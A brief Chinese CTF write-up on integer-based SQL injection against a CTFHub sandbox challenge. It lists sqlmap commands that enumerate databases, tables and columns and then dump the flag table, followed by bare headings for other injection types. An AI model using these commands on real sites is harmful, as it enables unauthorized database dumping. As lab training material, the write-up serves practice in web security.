SQL 整数型注入
第一次比赛就是败给了sql注入的题目- -
我这里给出一种用sqlmap的方法 除了最后回弹数据有点慢
python sqlmap.py -u http://challenge-0da82b744cd4b04e.sandbox.ctfhub.com:10080/?id=1 --dbs
直接爆数据库得到
前三张表都是自带的 直接爆sqli
python sqlmap.py -u http://challenge-0da82b744cd4b04e.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables
爆表
python sqlmap.py -u http://challenge-0da82b744cd4b04e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns
爆字段
python sqlmap.py -u http://challenge-0da82b744cd4b04e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump
拿到flag
剩下的如法炮制即可
字符型注入
报错注入
布尔盲注
